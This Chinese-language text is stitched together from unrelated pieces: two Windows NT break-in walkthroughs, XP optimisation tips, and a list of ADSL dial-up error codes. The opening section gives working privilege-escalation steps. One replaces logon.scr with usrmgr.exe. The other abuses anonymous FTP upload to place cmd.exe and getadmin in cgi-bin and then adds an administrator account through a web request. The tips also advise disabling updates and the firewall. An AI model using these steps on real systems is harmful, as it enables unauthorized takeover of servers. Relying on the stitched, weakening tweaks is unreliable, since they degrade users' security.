先把c:\winnt\system32下的logon.scr改名为logon.old备份

    然后把usrmgr.exe改名为logon.scr

    然后重新启动

    logon.scr是启动时加载的程序，重新启动后，不会出现以往的登陆密码输入界面，而是用户管理器。

    这时他就有权限把自己加到Administrator组

    不要忘记把文件名改回来啊!

    之二:

    下面的技术适用于不重视NT网络安全的网站,

    一些 http的技术也可以供较高级的人员参考

    进入NT网络可以采取下面的步骤:

    因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的，有些anonymous的帐号还有upload权限，我们就要攻击这类站点。因为如果不允许匿名帐号，就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

    正因为允许匿名帐号ftp登陆的设定，也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

    ftp www.xxx.com

    Connected to www.xxx.com

    ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下，必然会有一个IUSER_ntsvr2的用户帐号，属于Domain user组，这个帐号我们以后要用来获取Administrator的权限。

    User (www.xxx.comnone)):anonymous

    Password: 输入 guest@ 或者guest

    对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组。

    在这种情况下我们就可以进NT server的ftp了。

    进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功，这时你就有了80%的把握。

    现在,开始查找cgi-bin目录(或者scripts目录),进去以后,

    把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin

    然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN

    大约十多秒后屏幕显示:

    CGI Error

    这时有90%的可能是：你已经把IUSER_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。

    下面可以add user:

    http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

    这样就创建了一个叫china用户,密码是news,然后:

    http://www.xxx.com/cgi-bin/getadmin.exe?china

    或者

    http://www.xxx.com/scripts/tools/getadmin.exe?china

    你再用china的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

　　假如你打开zip文件的话用winzip或者winrar软件的话，以下优化是一个相当好的优化，Windows XP内置了对ZIP文件的，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现 这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了。

　　开始→运行: regsvr32 /u zipfldr.dll

　　2、减少开机磁盘扫描等待时间，重启时候马上你会看到效果。

　　开始→运行:chkntfs /t:0

　　3、删除系统备份文件,在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。

　　开始→运行:sfc.exe /purgecache

　　然后回车即可,可节省百兆。

　　假如担心的话，可不执行，此做法只会节省空间，而不是加速。

　　4、开始→运行: services.msc进入XP自带服务修改列表

　　在列表每个服务的属性里可选"关闭","手动","自动"。

　　alerter -错误警报器。 (可关闭)

　　application layer gateway service -给与第三者网络共享/防火墙支持的服务，有些防火墙/网络共享软件需要。占用1。5mb内存。 (可关闭)

　　application management-用于设定，发布和删除软件服务。

　　automatic updates -windows自动更新。(可关闭)

　　background intelligent transfer service - 这个服务原是用来实现http1.1服务器之间的信息传输，微软称支持windows更新时断点续传

　　clipbook - 用与局域网电脑来共享 粘贴/剪贴的内容。(可关闭)

　　com+Event system　-一些 COM+　软件需要。(检查你的 c:\program files\ComPlus Applications 目录，没东西可以把这个服务关闭)

　　COM+Event system application　-同上 (可关闭)

　　COmputer browser -用来浏览局域网电脑的服务，但关了也不影响浏览!(可关闭)

　　cryptographic services -windows更新时用来确认windows 文件指纹的，我更新时才开启一下。 (可关闭)

　　DHCP client-静态IP者需要(xDSL　等)。

　　Distributed link tracking client-用于局域网更新连接信息，比如在电脑A有个文件，在B做了个连接，如果文件移动了，这个服务将会更新信息。占用4兆内存。 (可关闭)

　　Distributed Transaction coordinator-无聊的东西。 (可关闭)

　　DNS Client-DNS解析服务。(可关闭)

　　Error reporting service -错误报告器，把windows中错误报告给微软。(可关闭)

　　*Event Log- 系统日志纪录服务，很有用于查找系统毛病.

　　Fast user switching compatibility-多用户快速切换服务。(可关闭)

　　help and support -帮助。(可关闭)

　　Human interface device access-支持"弱智"电脑配件的。比如键盘上调音量的按钮等等。(可关闭)

　　IMAPI CD-burning COM service　-xp刻牒服务，用软件就不用了。占用1.6兆内存 (可关闭)

　　Indexing service -恐怖的xp减速……(可关闭)

　　Internet Connection Firewall(ICF)……-xp防火墙。(不用的话可关闭)

　　IPSEC Services-大众用户连边都沾不上。 (可关闭)

　　Logical Disk manager　-磁盘管理服务。需要时它会通知你，所以一般关。 (可关闭)

　　Logical Disk manager administrative service-同上。 (可关闭)

　　messenger -不是msn，不想被骚扰的话就关。注:妖刺就是利用这个。 (可关闭)

　　MS software shadow copy provider-无用，据说是备份用的。但……没用。 (可关闭)

　　Net Logon-登陆Domain Controller用的。(可关闭)

　　Netmeeting remote desktop sharing-用netmeeting实现电脑共享。(可关闭)

　　Network Connections - 上网/局域网要用的。

　　Network DDE　-和clipbook一起用的。(可关闭)

　　Network DDE DSDM　-同上 (可关闭)

　　Network Location Awareness-如有网络共享或ICS/ICF可能需要。(服务器端) (可关闭)

　　NT LM Security support provider-telnet　服务用的。(可关闭)

　　NVIDIA Driver Helper service -nvidia 显卡帮助。(可关闭)

　　PDEngine - perfectdisk 引擎

　　PDScheduler -perfectdisk 计划服务

错误 605 Cannot set port information
问题：拨号网络网络由于设备安装错误不能设定使用端口
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装。

错误 606 The port is not connected
问题：拨号网络网络不能连接所需的设备端口
原因：RasPPPoE没有完全和正确的安装，连接线故障，ADSL MODEM故障
解决：卸载干净任何PPPoE软件，重新安装，检查网线和 ADSL MODEM。

错误 608 The device does not exist
问题：拨号网络网络连接的设备不存在
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装。

错误 609 The device type does not exist
问题：拨号网络网络连接的设备其种类不能确定
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装。

错误 611 The route is not available/612 The route is not allocated
问题：拨号网络网络连接路由不正确
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障
解决：卸载干净任何PPPoE软件，重新安装。

错误 617 The port or device is already disconnecting
问题：拨号网络网络连接的设备已经断开
原因：RasPPPoE没有完全和正确的安装，ISP服务器故障，连接线，ADSL MODEM故障
解决：卸载干净任何PPPoE软件，重新安装， ，检查网线和 ADSL MODEM。

错误 619 问题：与ISP服务器不能建立连接
原因：ADSL ISP服务器故障，ADSL电话线故障
解决：检查ADSL信号灯是否能正确同步。

错误 621 Cannot open the phone book file
错误 622 Cannot load the phone book file
错误 623 Cannot find the phone book entry
错误 624 Cannot write the phone book file
错误 625 Invalid information found in the phone book
问题：Windows NT或者Windows 2000 Server网络RAS网络组件故障
原因：卸载所有PPPoE软件，重新安装RAS网络组件和RasPPPoE。

错误629，已经与对方计算机断开连接。 请双击此连接，再试一次。
如果出现这个问题，情况比较复杂，因为有多种情况可以导致"错误629"，多数情况是因为同时拨入的人数过多造成的。另外，在您的拨号连接设置中应该全部采取默认设置，如"启用软件压缩"、"登陆网络"都需要选上。一般来讲，此种情况也有可能是由于您所用的MODEM或电话线的性能和质量原因，以至于在您选定的通讯速率上不能很好地建立连接，还有一种情况就是： 如果您的电话开启了防盗打功能，在拨号时将有调制解调器的握手音，但握手音响后将出现错误629，如果有分机拨打电话，电话就会报警，只要把防盗打功能关掉就可以了。

错误 630
问题：ADSL MODEM没有没有响应
原因：ADSL电话线故障，ADSL MODEM故障（电源没打开等）
解决：检查ADSL设备。

错误 633
问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接。
原因：RasPPPoE没有完全和正确的安装。
解决：卸载干净任何PPPoE软件，重新安装。

错误 638
问题：过了很长时间，无法连接到ISP的ADSL接入服务器
原因：ISP服务器故障；在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码
解决：运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务，以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

错误 645
问题：网卡没有正确响应
原因：网卡故障，或者网卡驱动程序故障
解决：检查网卡，重新安装网卡驱动程序。

错误 650
问题：远程计算机没有响应，断开连接
原因：ADSL ISP服务器故障，网卡故障，非正常关机造成网络协议出错
解决：检查ADSL信号灯是否能正确同步，；检查网卡，删除所有网络组件重新安装网络。

错误 651
问题：ADSL MODEM报告发生错误
原因：Windows处于安全模式下，或其他错误
解决：出现该错误时，进行重拨，就可以报告出新的具体错误代码。

错误676，占线。 请稍后再试。
请先检查电话线是否有问题，请将电话线拔下，直接接在电话上，用电话拨要拨的ISP电话号码（比如163，169），听一听听筒里有没有类似传真音的尖叫声，如果有此声，说明您的电话可以拨号上网，请确认在"我的电脑"->"拨号网络"->"XXX连接（您的拨号连接）"中的电话号码在ISP电话号码前没有其他数字，如您是通过分机拨号，需在电话号码之前加外线号和逗号,例如"0，163"。如果在听筒中确为占线音，且占线频率极高。

错误678，拨入方计算机没有应答,无法完成拨号网路连接。
原因：
1、连接adsl modem与网卡之间的连接网线出现问题，以致系统无法与adsl modem连接。
2、adsl modem没有电源供应，以致系统无法与adsl modem连接
3、ADSL modem本身有问题，以致未有讯号
4、局端问题　
解决：
1、检查连接线是否正常　
2、检查电源是否正常，adsl modem的电源开关是否开启
这种情况和占线有些类似，多为偶然现象，有时是因为调制解调器刚刚开启就拨号导致的，请先确认将电话线（连接电话局的那一根）插入调制解调器的"LINE"接口上。检查电话线是否有问题，请将电话线拔下，直接接在电话上，用电话拨要拨打的ISP电话号码（比如163，169），听一听听筒里有没有类似传真音的尖叫声，如果有此声，说明您的电话可以拨号上网，请确认"我的电脑"->"拨号网络"->"XXX连接（您的拨号连接）"中的电话号码在ISP电话号码之前没有其他数字，如您是通过总机拨号，需在电话号码之前加外线号和逗号,例如"0，163"。如果是占线音，请联系ISP客户服务部。如果没有任何声音或有提示音说您不能拨打此电话号码，那这说明您的电话线有问题。

错误680　没有拨号音。
出现这个错误，请检测调制解调器是否正确连到电话线，然后检查以下几个方面：
1、先检查电话线是否连接，如果没发现问题，请将电话线拔下，直接接在电话上，用电话拨要拨的ISP电话号码试一试（比如163，169），听一听听筒里有没有类似传真音的尖叫声，如果有此声，说明您的电话可以拨号上网，可能是刚才您拨号时有电话打进来，或是您的调制解调器有故障。 如果是占线音，请联系ISP客户服务部。如果没有任何声音或有提示音说您不能拨打此电话号码，那这说明您的电话线有问题。

错误 691
问题：输入的用户名和密码不对，无法建立连接
原因：用户名和密码错误，ISP服务器故障
解决：使用正确的用户名和密码，并且使用正确的ISP账号格式(name@service)。

错误 718
问题：验证用户名时远程计算机超时没有响应，断开连接
原因：ADSL ISP服务器故障
解决：致电电信。

错误 720
问题：拨号网络无法协调网络中服务器的协议设置
原因：ADSL ISP服务器故障，非正常关机造成网络协议出错
解决：删除所有网络组件重新安装网络。

错误 734
问题：PPP连接控制协议中止
原因：ADSL ISP服务器故障，非正常关机造成网络协议出错
解决：删除所有网络组件重新安装网络。

错误 738
问题：服务器不能分配IP地址
原因：ADSL ISP服务器故障，ADSL用户太多超过ISP所能提供的IP地址
解决：致电2022370。

错误 797
问题：ADSL MODEM连接设备没有找到
原因：ADSL MODEM电源没有打开，网卡和ADSL MODEM的连接线出现问题，软件安装以后相应的协议没有正确邦定，在创立拨号连接时，建立了错误的空连接
解决：检查电源，连接线；检查网络属性，RasPPPoE相关的协议是否正确的安装并正确邦定（相关协议），检查网卡是否出现?号或!号，把它设置为Enable;检查拨号连接的属性，是否连接的设备使用了一个"ISDN channel-Adapter Name(xx)" 的设备，该设备为一个空设备，如果使用了取消它，并选择正确的PPPoE设备代替它，或者重新创立拨号连接。